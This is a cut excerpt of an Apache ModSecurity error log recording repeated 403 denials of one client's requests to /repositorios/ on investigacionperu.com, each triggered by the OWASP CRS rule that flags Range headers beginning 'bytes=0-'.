"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaqvoDupyaoF2tAucvQAAANI"] [Mon Feb 17 10:36:10.973832 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:36520] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs75AAAAIA"] [Mon Feb 17 10:36:11.072786 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36522] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucvgAAANE"] [Mon Feb 17 10:36:11.174239 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36524] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucvwAAANY"] [Mon Feb 17 10:36:11.271742 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36526] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucwAAAAM8"] [Mon Feb 17 10:36:11.368260 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36528] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucwQAAAMc"] [Mon Feb 17 10:36:11.468336 2025] [:error] [pid 10662:tid 140634174207744] [client 190.102.150.245:36530] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa__97XY8xax64gWTmwAAAA0"] [Mon Feb 17 10:36:11.564528 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36532] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucwgAAAMg"] [Mon Feb 17 10:36:11.660934 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36534] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucwwAAAMI"] [Mon Feb 17 10:36:11.757711 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:36536] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucxAAAAMo"] [Mon Feb 17 10:36:11.859691 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:36538] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucxQAAAMw"] [Mon Feb 17 10:36:11.956194 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36540] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXa6voDupyaoF2tAucxgAAANU"] [Mon Feb 17 10:36:12.053139 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36542] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAucxwAAAM4"] [Mon Feb 17 10:36:12.149737 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36544] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAucyAAAAMQ"] [Mon Feb 17 10:36:12.246425 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36546] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAucyQAAANM"] [Mon Feb 17 10:36:12.346112 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36548] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAucygAAAMY"] [Mon Feb 17 10:36:12.443227 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36550] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAucywAAANA"] [Mon Feb 17 10:36:12.539553 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36552] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAuczAAAAMA"] [Mon Feb 17 10:36:12.637174 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36554] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXbKvoDupyaoF2tAuczQAAAME"] [Mon Feb 17 10:36:16.076306 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36560] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcAJrayd7JfpBdXs75QAAAI8"] [Mon Feb 17 10:36:16.174802 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36562] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcAJrayd7JfpBdXs75gAAAJM"] [Mon Feb 17 10:36:16.271826 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36564] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuczgAAANY"] [Mon Feb 17 10:36:16.369045 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36566] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuczwAAAMc"] [Mon Feb 17 10:36:16.465110 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36568] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuc0AAAAMg"] [Mon Feb 17 10:36:16.562012 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36570] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuc0QAAAMI"] [Mon Feb 17 10:36:16.661133 2025] [:error] [pid 10664:tid 140634199385856] [client 190.102.150.245:36572] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcAJrayd7JfpBdXs75wAAAIo"] [Mon Feb 17 10:36:16.759165 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36574] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuc0gAAAM0"] [Mon Feb 17 10:36:16.865033 2025] [:error] [pid 10664:tid 140634182600448] [client 190.102.150.245:36576] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcAJrayd7JfpBdXs76AAAAIw"] [Mon Feb 17 10:36:16.962761 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36578] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcKvoDupyaoF2tAuc0wAAAMk"] [Mon Feb 17 10:36:17.060109 2025] [:error] [pid 10664:tid 140634174207744] [client 190.102.150.245:36580] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcQJrayd7JfpBdXs76QAAAI0"] [Mon Feb 17 10:36:17.157246 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36582] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcQJrayd7JfpBdXs76gAAAIY"] [Mon Feb 17 10:36:17.254394 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36584] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcavoDupyaoF2tAuc1AAAANU"] [Mon Feb 17 10:36:17.351884 2025] [:error] [pid 10664:tid 140634140636928] [client 190.102.150.245:36586] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcQJrayd7JfpBdXs76wAAAJE"] [Mon Feb 17 10:36:17.449736 2025] [:error] [pid 10662:tid 140634199385856] [client 190.102.150.245:36588] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcf_97XY8xax64gWTnAAAAAo"] [Mon Feb 17 10:36:17.552460 2025] [:error] [pid 10662:tid 140634207778560] [client 190.102.150.245:36590] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcf_97XY8xax64gWTnQAAAAk"] [Mon Feb 17 10:36:17.650538 2025] [:error] [pid 10663:tid 140634354153216] [client 190.102.150.245:36592] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcbUcx1xj5z0EGUpRlQAAAEA"] [Mon Feb 17 10:36:17.747950 2025] [:error] [pid 10664:tid 140634165815040] [client 190.102.150.245:36594] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcQJrayd7JfpBdXs77AAAAI4"] [Mon Feb 17 10:36:17.844500 2025] [:error] [pid 10664:tid 140634216171264] [client 190.102.150.245:36596] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcQJrayd7JfpBdXs77QAAAIg"] [Mon Feb 17 10:36:17.942550 2025] [:error] [pid 10663:tid 140634266527488] [client 190.102.150.245:36598] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcbUcx1xj5z0EGUpRlgAAAEI"] [Mon Feb 17 10:36:18.039171 2025] [:error] [pid 10663:tid 140634258134784] [client 190.102.150.245:36600] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcrUcx1xj5z0EGUpRlwAAAEM"] [Mon Feb 17 10:36:18.136439 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36602] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXcgJrayd7JfpBdXs77gAAAJQ"] [Mon Feb 17 10:36:18.234231 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36604] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id 